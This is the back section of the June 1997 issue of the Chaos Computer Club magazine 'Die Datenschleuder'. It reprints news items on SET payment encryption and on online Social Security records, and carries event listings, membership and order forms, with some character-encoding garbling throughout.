For that reason, the consortium of technology
companies and creditors that has spent two
years years developing the Secure Electronic
Transaction (SET) protocol may switch to a
faster encryption system called Elliptic Curve,
which is produced by <Certicom Corp>.
The Þrst complete version of SET, known as
SET 1.0, will be available to software makers
June 1 with core cryptography provided by
RSA Data Security, a unit of Security
Dynamics Technologies Inc <SDTI.O>. ãRSA
is a very good starting point. But we suspect
that in a year or two, the Kevin Mitnicks of
the world will start to Þgure out ways to hack
it,Ò Mott said, referring to Mitnick, a
notorious computer hacker. ãThe only way
you scale an RSA is to add a lot more bits.
You add a lot more bits and it becomes more
complex software in terms of the interaction
of the transaction messages. ThatÕs part of
whatÕs taken SET so long to start with,Ò he
said. Mott told that the Elliptic Curve system
would make a better encryption core. In fact,
he said it would have been chosen in the Þrst
place if developers had been known about it.
ãIt will Þt on a chip card. I think its 160 bits
equals security to 1,024 bits of RSA,Ò the
credit industry executive said. ãWe anticipate
putting it intosome SET 1.0 pilots in the very
near future this year in the U.S.Ò Far from
being disturbed by the possibility of hackers
getting through the current SET
cryptography, Mott said SETÕs developers
would ãgive them an award and a ribbon and
then embody whatever they did as part of the
improvementsÒ in the next version of security
standards. ãThe current version for SET is as
safe as anybody can make it,Ò he said.
(Nach 09.04.1997/Reuter)

Die Datenschleuder
Nummer 59, Juni 1997

Das allerletzte
Social Security Info Now on Web

WASHINGTON (AP 08.04.1997) Ñ Social
security records now available through the
Internet pose few security threats to the
individuals who request them, administration
ofÞcials said Monday. For the past month,
Americans have been able to get their Social
Security records sent to them electronically.
The information previously had to be mailed
to their homes in a process that took up to six
weeks Ñ and at a cost of millions of dollars
in postage each year. Phil Gambino, a spokesman for the Social Security Administration,
said the top priority of the new program is
maintaining privacy, and several security features have been built into the new system to
do just that. ãThe information going back
and forth between the requester and Social
Security is encrypted, so if it gets intercepted
in the middle, it canÕt be interpreted Ñ it
would look like jibberish,Ò he said. Auditors
also are able to trace the origin of a request
back to the exact personal computer used to
make it, he said. Still, critics concerned about
privacy rights are worried. ãAs soon as
crooks start exploiting this service to get
other peopleÕs information, Social Security is
going to have a real problem on its hands,Ò
Evan Hendricks, chairman of the U.S. Privacy
Council in Washington, told USA Today. The
newspaper identiÞed various types of
potential abuse: potential employers could
get the salary history of job applicants; coworkers could determine how much fellow
employees make; landlords could use the
information to determine whether someone
can afford an apartment. But Gambino said
anyone who intends to abuse the system
would have to overcome several hurdles. ãWe
built into the system, right from the
beginning, the strongest security system available,Ò Gambino said. ãThe only way they can
get around it is by committing a crime and in
order to commit the crime they have to go
through a great deal of effort to get all that
identifying information.Ò
http://www.ssa.gov
WASHINGTON (AP 10.04.1997) Ñ Social
Security ofÞcials pulled the plug on an
Internet site that provided individual
earnings and retirement beneÞt records and
decided to begin asking Americans whether
such information should be available online
and, if so, how much.....

Internet jetzt mit Flirtmaschine

The Internet is transforming courtship, with a
service as sly as it is shy. Mixing digital-age
efÞciency with old-fashioned mystery, a
freeweb site called ãSecret Admirer Ñ The
Electronic Cupid,Ò
http://www.SecretAdmirer.com, lets users
anonymously Þnd out if their romantic
feelings are mutual. When you receive a
Secret Admirer e-mail it reads: ãThis message
has been sent by a secret admirer! Is the
feeling mutual?Ò The only way to Þnd out
who may have sent you a message is to go to
the web site and send an anonymous Secret
Admirer message of your own. If you send
one to the person who sent one to you, the
Secret Admirer database recognizes a match.
For the full text story, see
http://www.merc.com/stories/cgi/story.cgi?
id=3293608-ccd

Hallo Leute,

die "Sportsfreunde der Sperrtechnik Deutschland e.V."
sind jetzt ofÞziel eingetragen.
Besucht uns doch mal unter:
"http://www.ssdev.org"

❊❊❊❊
❅❏❆
❊❊❊❊
Die Datenschleuder
Nummer 59, Juni 1997

Termine / Veranstaltungen
8.-10.08.1997 HOPE II in New York. Informationen siehe www.2600.com

08.-10.08.1997 HIP«97 (Hacking in Progress) in Holland. Informationen siehe www.hip97.nl

02.-03.08.1997 Mitgliederversammlung des CCC e.V. in Hamburg, Eidelstedter BŸrgerhaus
Einladung geht den Mitgliedern noch per getrennter Post zu. Wer bis Mitte Juli
noch keine Einladung hat mšge sich an ofÞce@ccchh.ccc.de wenden.

Die Datenschleuder
Nummer 59, Juni 1997

Postvertriebsstück C11301F

Der Mitgliedsfetzen

Mitgliedsanträge und Datenschleuderabonnement
o Satzung + Mitgliedsantrag
(DM 5,00 in Briefmarken)
o Datenschleuder-Abo
Normalpreis DM 60,00 für 8 Ausgaben
o Datenschleuder-Abo
Ermäßigter Preis DM 30,00 für 8 Ausgaben
o Datenschleuder-Abo
Gewerblicher Preis DM 100,00 für 8 Ausgaben
(Wir schicken eine Rechnung)
Die Kohle liegt
o in bar
o als Verrechnungsscheck
o in Briefmarken

CCC e.V., Schwenckestr. 85, D-20255 Hamburg

Der Bestellfetzen

bei bzw.
o

wurde überwiesen am ___.___.______ auf
Chaos Computer Club e.V., Konto 59 90 90-201
Postbank Hamburg, BLZ 200 100 20

Ort/Datum
_______________________________________________

Unterschrift
_______________________________________________

Name
______________________________________________

Straße
_______________________________________________

PLZ, Ort
______________________________________________

Tel/Fax
______________________________________________

Alle Bestellungen und Mitgliedsanträge an:

Literatur

50,00
15,00
15,00
15,00
15,00
15,00
15,00
15,00

Alle
Alle
Alle
Alle
Alle
Alle
Alle
Alle

Datenschleudern der Jahre 1984-1989
Datenschleudern des Jahres 1990
Datenschleudern des Jahres 1991
Datenschleudern des Jahres 1992
Datenschleudern des Jahres 1993
Datenschleudern des Jahres 1994
Datenschleudern des Jahres 1995
Datenschleudern des Jahres 1996

_____ DM 42,00
Mailbox auf den Punkt gebracht
_____ DM 29,80
Deutsches PGP-Handbuch, 3. Auflage + CD-ROM
_____ DM
5,00
Doku zum Tod des „KGB“- Hackers Karl Koch
_____ DM 25,00
Congressdokumentation CCC ‘93
_____ DM 25,00
Congressdokumentation CCC ‘95
_____ DM 50,00 Lockpicking: Über das Öffnen von Schlössern

DM
DM
DM
DM
DM
DM
DM
DM

Alte Datenschleudern
_____
_____
_____
_____
_____
_____
_____
_____

Sonstiges

Portopauschale!

_____ DM 50,00
Blaue Töne / P O C S A G - D e c o d e r /
P C - D E S Verschlüsselung
5,00
1 Bogen „Chaos im Äther“
5,00 5 Aufkleber „Kabelsalat ist gesund“
_____ DM
_____ DM

+ DM 05,00

_____ Gesamtbetrag
Die Kohle liegt
o in bar
o als Verrechnungsscheck
bei bzw.
o

wurde überwiesen am ___.___.______ auf
Chaos Computer Club e.V., Konto 59 90 90-201
Postbank Hamburg, BLZ 200 100 20

Name
_______________________________________________

Straße
_______________________________________________

Die Datenschleuder

Nummer 59, Juni 1997